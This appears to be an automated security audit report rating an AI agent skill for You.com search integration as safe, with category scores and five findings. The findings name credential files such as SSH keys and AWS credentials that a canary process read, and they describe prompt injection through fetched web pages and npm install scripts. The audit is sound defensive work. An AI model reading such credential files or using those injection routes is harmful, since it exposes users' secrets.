Is edwardirby/ydc-ai-sdk-integration safe?

https://github.com/openclaw/skills/tree/main/skills/edwardirby/ydc-ai-sdk-integration

92
SAFE

The ydc-ai-sdk-integration skill is a well-structured developer workflow guide with no prompt injection, no hidden instructions, and no malicious code execution surface. Runtime monitoring confirmed that all sensitive-file accesses occurred before installation (attributable to the oathe canary-placement process), no unexpected network connections were made, all canary honeypots remained intact, and filesystem changes were limited exclusively to the skill directory. The only material risks are the inherent third-party data-sharing nature of You.com's search API (expected and disclosed) and a standard npm package dependency that should be independently vetted.

Category Scores

Prompt Injection 95/100 · 30%
Data Exfiltration 85/100 · 25%
Code Execution 90/100 · 20%
Clone Behavior 97/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 88/100 · 5%

Findings (5)

LOW Third-Party API Data Sharing by Design -8

Every query made through youSearch, youExpress, or youContents is transmitted to You.com's API servers along with the user's YDC_API_KEY. This is the explicit purpose of the skill but represents a data-sharing agreement users must accept. Users in regulated or sensitive environments should evaluate You.com's data retention policies before installing.

LOW Third-Party npm Package with Unaudited Install Lifecycle -5

The skill instructs the agent to install @youdotcom-oss/ai-sdk-plugin, which may contain npm preinstall/postinstall scripts that execute arbitrary code on the developer's machine. The package is from a named org and is disclosed upfront, but the skill's security posture depends on that package remaining uncompromised.

INFO youContents Second-Order Content-Injection Risk -5

The youContents URL-extraction tool fetches and returns raw web content into the agent's context. A sophisticated attacker who controls a web page the user later visits could embed prompt-injection payloads in that page's content, which youContents would then surface to the agent. This is a theoretical second-order risk contingent on separate attack vectors, not a defect in this skill's instructions.

INFO Author Attribution Mismatch -3

The SKILL.md frontmatter declares metadata.author as 'youdotcom-oss' (a GitHub organization) while _meta.json lists the owner as the individual 'edwardirby'. This does not constitute a security threat but reduces provenance auditability and may cause users to incorrectly attribute the skill to the You.com OSS organisation.

INFO Pre-Clone Sensitive File Accesses Attributed to Audit Framework 0

inotify and auditd logs show opens of .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCloud credentials at 13:59:02, six seconds before the skill git clone at 13:59:08. Timing and canary-intact result confirm these are oathe canary-placement reads, not skill-initiated. Documented here for full transparency.